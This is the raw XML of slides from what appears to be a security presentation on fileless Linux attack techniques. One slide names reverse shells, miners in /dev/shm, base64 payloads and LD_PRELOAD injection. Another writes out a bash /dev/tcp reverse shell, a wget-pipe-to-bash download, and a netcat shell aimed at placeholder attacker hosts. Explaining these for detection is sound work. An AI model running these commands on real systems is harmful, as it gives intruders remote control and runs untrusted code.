                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{736E5875-B605-BC96-ECD4-E85D9631DCC8}"/>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3124203" y="1656374"/>
            <a:ext cx="11887198" cy="7380793"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1386609" cy="1606173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1386609" cy="1606173"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1386609" h="1606173">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1386609" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386609" y="1606173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1606173"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C51AF6"/>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="1386609" cy="165379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5320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 9"/>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06/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="AutoShape 10"/>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12" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8286925" y="2083111"/>
            <a:ext cx="1238075" cy="850589"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="850589" h="850589">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="850589" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850589" y="850589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8505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4572000" y="3596619"/>
            <a:ext cx="8552067" cy="1308435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5113"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4261" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>example real-world Behavior</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16013068" y="1967320"/>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a:off x="-2233092" y="5378935"/>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0" name="Group 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="711451" y="3490301"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="AutoShape 21"/>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2" name="AutoShape 22"/>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23" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11369132" y="711451"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="AutoShape 24"/>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5" name="AutoShape 25"/>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
        <p:nvSpPr>
          <p:cNvPr id="26" name="Freeform 26"/>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TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CBA43B0-0550-5126-54DE-B2B27F6F9E25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4504267" y="5342572"/>
            <a:ext cx="9287933" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
              </a:rPr>
              <a:t>✔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attackers run reverse shells entirely via bash</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
              </a:rPr>
              <a:t>✔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Crypto-miners launched via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/dev/shm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/self/mem</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
              </a:rPr>
              <a:t>✔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Base64-encoded payloads executed directly via command substitution</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
              </a:rPr>
              <a:t>✔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LD_PRELOAD and process injection used without files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bottom line:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> No artifact = nothing to hash, nothing to scan, very little persistent evidence.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a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C648346-393F-2A90-33E0-4900BE61EEB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31FC6BA-A206-2119-40EF-3124D6E6D58E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4423427" y="1386251"/>
            <a:ext cx="9441145" cy="4945071"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12588193" cy="6593427"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91601437-0C22-78E8-8103-D2D661EAF81A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect t="10716" b="10716"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="12588193" cy="6593427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C750866-9967-B89C-A21B-E6E3E8381ED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4204644" y="6362700"/>
            <a:ext cx="9840861" cy="3882409"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/4444 0&gt;&amp;1   # reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>wget https://malicious.com/payload -O - | bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>nc -e /bin/bash attacker.com 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>All of these look like regular sysadmin usage in many environments without process telemetry.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EFEC4BB-3C27-2970-C240-8BB1BDED6158}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8823FEB5-DBC8-564F-9BC6-E00B7A5E4882}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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04/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="AutoShape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4275C680-7594-5219-249A-11D6FF75CE79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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10" name="Freeform 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E218463D-1373-1EA7-36AC-E5FB7CD50330}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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0E5840C4-1102-1263-C38F-89E1543A7B16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2561915" y="1708532"/>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45D35B4E-F3F9-7740-2235-4942C71EA6AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16712548" y="1708532"/>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541A428F-C5F6-A986-68FA-550F2E9682B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2569829" y="2229821"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="AutoShape 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98C4E8F7-6DBE-4122-4EC5-FA385B1FF75F}"/>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5" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{377357D4-7EBF-EBEE-1C8B-6DDBC7C21635}"/>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16" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBFAE5D7-0986-F1AB-7FEC-2FD06B6F4FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14780594" y="5143500"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="AutoShape 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E619466-EE0A-B62B-C2D0-E6B5B6F10C05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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8" name="AutoShape 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21C6EAF4-08CB-6199-52E4-74D1357FA317}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC4BDAEA-23EA-3D8D-7EA1-3505DFA1C5C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3314700"/>
            <a:ext cx="9268639" cy="830292"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEE93E13-E282-E27F-1005-A4EEECBE6807}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3667605" y="1790700"/>
            <a:ext cx="10581795" cy="4351306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266502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1143000" y="3579916"/>
            <a:ext cx="1426093" cy="1426093"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="375596" cy="375596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freeform 3"/>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txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 4"/>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143000" y="6323097"/>
            <a:ext cx="1426093" cy="1426093"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="375596" cy="375596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Freeform 6"/>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txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 7"/>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338303" y="6438134"/>
            <a:ext cx="1123244" cy="1123244"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1123244" h="1123244">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1123244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123244" y="1123244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11232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356641" y="3740301"/>
            <a:ext cx="998810" cy="1105323"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="998810" h="1105323">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="998811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998811" y="1105323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11053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7518062" y="419100"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="AutoShape 11"/>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2" name="AutoShape 12"/>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13" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="16102893" y="2082985"/>
            <a:ext cx="634498" cy="634498"/>
